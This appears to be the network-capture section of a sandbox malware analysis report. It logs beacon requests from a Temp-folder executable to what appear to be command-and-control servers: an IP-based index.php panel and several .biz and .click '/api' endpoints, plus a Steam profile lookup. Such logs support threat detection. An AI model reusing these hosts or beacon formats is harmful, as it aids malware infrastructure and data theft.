Dec 14, 2024 13:02:13.487854004 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 13:02:14.830697060 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:02:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.4	50365	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:02:16.572128057 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 13:02:17.908144951 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:02:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.4	50366	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:02:19.546772957 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 13:02:21.089010954 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:02:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.4	50367	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:02:22.828560114 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 13:02:24.170072079 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:02:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.4	50368	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:02:25.810249090 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 13:02:27.157598019 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:02:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.4	50369	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:02:28.894819975 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 13:02:30.228312016 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:02:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.4	50370	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:02:31.868546009 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 13:02:33.213669062 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:02:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.4	50372	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:02:34.962415934 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 13:02:36.295731068 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:02:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49771	104.21.67.145	443	2056	C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:56:13 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: bellflamre.click
2024-12-14 11:56:13 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 11:56:15 UTC	1012	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:56:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mbv830der66nqv3595nasgc600; expires=Wed, 09-Apr-2025 05:42:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lZOWDNJvMPshVhkIO7BzrBj59u%2BsVfQ0sR8Y0Swj1vJ10ImS%2BpSzqA8FTrlPvsy85vTvh%2FGnusrkWuj3ZOgAV1BKuJIgQ2GVSo40GKn9i5VwGd1BA7EHyq%2FEZSuoi1WYMEeK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f1e0269e8887277-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2000&min_rtt=1995&rtt_var=759&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1432074&cwnd=225&unsent_bytes=0&cid=421c63a36ea2537f&ts=1938&x=0"
2024-12-14 11:56:15 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 11:56:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49783	104.21.22.222	443	2056	C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:56:16 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: immureprech.biz
2024-12-14 11:56:16 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 11:56:18 UTC	1014	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:56:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rg49s5apfa9h6lfutma9o6caee; expires=Wed, 09-Apr-2025 05:42:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xv2O5xOWpcjfV5S2m9P9g3j3nPtnh8e7eTFzhZRI80f8Ce9OuY%2F7kDKu%2FgeMhCDYW9z49Un9%2F1DvhPgte%2BZ6mqLygOvqkeU7u7IkqaVa9fYrUJsiZj5QpvdQuDGnUtTVPPQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f1e027f8f2e8cb9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1788&min_rtt=1784&rtt_var=678&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1602634&cwnd=183&unsent_bytes=0&cid=cf96a0bd463d94e8&ts=1791&x=0"
2024-12-14 11:56:18 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 11:56:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49789	104.21.96.1	443	2056	C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:56:20 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: deafeninggeh.biz
2024-12-14 11:56:20 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 11:56:21 UTC	1014	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:56:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0gq3js9m8u0s8c4q100qb6e1lh; expires=Wed, 09-Apr-2025 05:43:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8fIzr45kCq1FrJZrpezJYzLTorWZlzrMYYRYKyIlGXKvMRlM%2FEN%2B%2BxmsMib2LR546%2BNaX0YnQhpn5RCcOPKUMqLXYfXkkDkyvIjmBOgcA97umjfs8HiJRYs3PPI46qZTC%2FFs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f1e02943c5542c0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1727&min_rtt=1715&rtt_var=667&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1610590&cwnd=208&unsent_bytes=0&cid=22c255dba9c7bf30&ts=1652&x=0"
2024-12-14 11:56:21 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 11:56:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49804	23.55.153.106	443	2056	C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:56:24 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-14 11:56:25 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sat, 14 Dec 2024 11:56:25 GMT Content-Length: 35131 Connection: close Set-Cookie: sessionid=9f8612a6551c1a78297f1c54; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-14 11:56:25 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-14 11:56:25 UTC	10097	IN	Data Raw: 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 Data Ascii: munity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SU
2024-12-14 11:56:25 UTC	10555	IN	Data Raw: 3b 57 45 42 5f 55 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 Data Ascii: ;WEB_UNIVERSE":"public","LANGUAGE":"english","COUNTRY":"US","MEDIA_CDN_COMMUNITY_URL":"https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/","MEDIA_CDN_URL":&qu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49866	142.250.181.132	443	1992	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:56:42 UTC	607	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-14 11:56:43 UTC	1266	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:56:42 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-A53r9th3mnDn3Nx270kZLQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-14 11:56:43 UTC	124	IN	Data Raw: 39 64 35 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6f 75 74 6c 61 6e 64 65 72 20 73 65 61 73 6f 6e 20 37 20 65 70 69 73 6f 64 65 20 31 32 20 72 65 63 61 70 22 2c 22 6f 72 65 67 6f 6e 22 2c 22 61 70 70 6c 65 20 69 6f 73 20 31 38 2e 32 20 75 70 64 61 74 65 22 2c 22 6d 6f 6e 74 61 6e 61 20 73 74 61 74 65 20 62 6f 62 63 61 74 73 20 66 6f 6f 74 62 61 6c 6c 22 2c 22 63 61 6e 61 Data Ascii: 9d5)]}'["",["outlander season 7 episode 12 recap","oregon","apple ios 18.2 update","montana state bobcats football","cana
2024-12-14 11:56:43 UTC	1390	IN	Data Raw: 64 61 20 70 6f 73 74 61 6c 20 77 6f 72 6b 65 72 73 20 73 74 72 69 6b 65 22 2c 22 67 65 6d 69 6e 69 64 73 20 6d 65 74 65 6f 72 20 73 68 6f 77 65 72 73 22 2c 22 73 68 65 6b 75 20 6b 61 6e 6e 65 68 20 6d 61 73 6f 6e 20 61 69 72 20 63 61 6e 61 64 61 22 2c 22 77 61 72 66 72 61 6d 65 20 31 39 39 39 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 Data Ascii: da postal workers strike","geminids meteor showers","sheku kanneh mason air canada","warframe 1999"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:sugges
2024-12-14 11:56:43 UTC	1010	IN	Data Raw: 74 6a 59 30 78 70 5a 56 56 34 53 44 5a 6c 59 6c 63 77 4f 56 51 78 4d 56 5a 7a 4f 58 64 77 4e 46 5a 49 65 58 4e 6f 63 30 78 4d 65 44 4e 78 59 33 68 78 52 45 39 78 64 55 78 73 61 31 67 35 54 45 35 73 63 55 6b 32 56 48 68 75 64 7a 6c 49 65 6c 45 30 64 56 64 71 63 58 42 30 4e 47 68 31 4e 32 31 77 64 6b 64 44 4e 48 49 78 4f 45 78 4c 59 31 70 34 57 58 4e 71 5a 6e 67 78 57 47 70 79 57 6b 59 79 59 33 56 49 51 58 64 32 4d 32 6c 79 62 30 35 57 4e 45 51 33 5a 46 42 75 55 47 5a 44 63 47 70 42 61 47 56 4c 64 57 4d 32 55 6a 46 6b 4e 47 31 56 64 56 42 36 5a 6e 67 34 52 47 38 79 64 6a 67 31 65 6e 5a 30 4f 54 4a 73 59 6b 64 74 56 56 68 69 4f 53 39 7a 54 33 56 49 4d 54 67 30 62 47 46 57 4b 7a 4d 34 65 54 6c 77 4d 55 74 6b 52 6c 56 44 4e 57 78 59 56 6b 5a 4e 4d 30 70 4a 64 Data Ascii: tjY0xpZVV4SDZlYlcwOVQxMVZzOXdwNFZIeXNoc0xMeDNxY3hxRE9xdUxsa1g5TE5scUk2VHhudzlIelE0dVdqcXB0NGh1N21wdkdDNHIxOExLY1p4WXNqZngxWGpyWkYyY3VIQXd2M2lyb05WNEQ3ZFBuUGZDcGpBaGVLdWM2UjFkNG1VdVB6Zng4RG8ydjg1enZ0OTJsYkdtVVhiOS9zT3VIMTg0bGFWKzM4eTlwMUtkRlVDNWxYVkZNM0pJd
2024-12-14 11:56:43 UTC	103	IN	Data Raw: 36 31 0d 0a 57 68 46 56 57 64 42 51 55 46 46 51 55 46 42 51 55 46 33 51 30 46 4e 51 55 46 42 51 31 64 73 57 58 64 30 51 55 46 42 51 58 63 78 51 6b 31 57 52 56 67 76 4c 79 38 72 4f 47 78 57 64 30 46 4a 52 6e 70 46 62 54 46 36 51 57 31 47 64 30 46 42 52 58 4e 42 51 55 56 6a 51 55 46 46 4e 45 46 42 52 57 0d 0a Data Ascii: 61WhFVWdBQUFFQUFBQUF3Q0FNQUFBQ1dsWXd0QUFBQXcxQk1WRVgvLy8rOGxWd0FJRnpFbTF6QW1Gd0FBRXNBQUVjQUFFNEFBRW
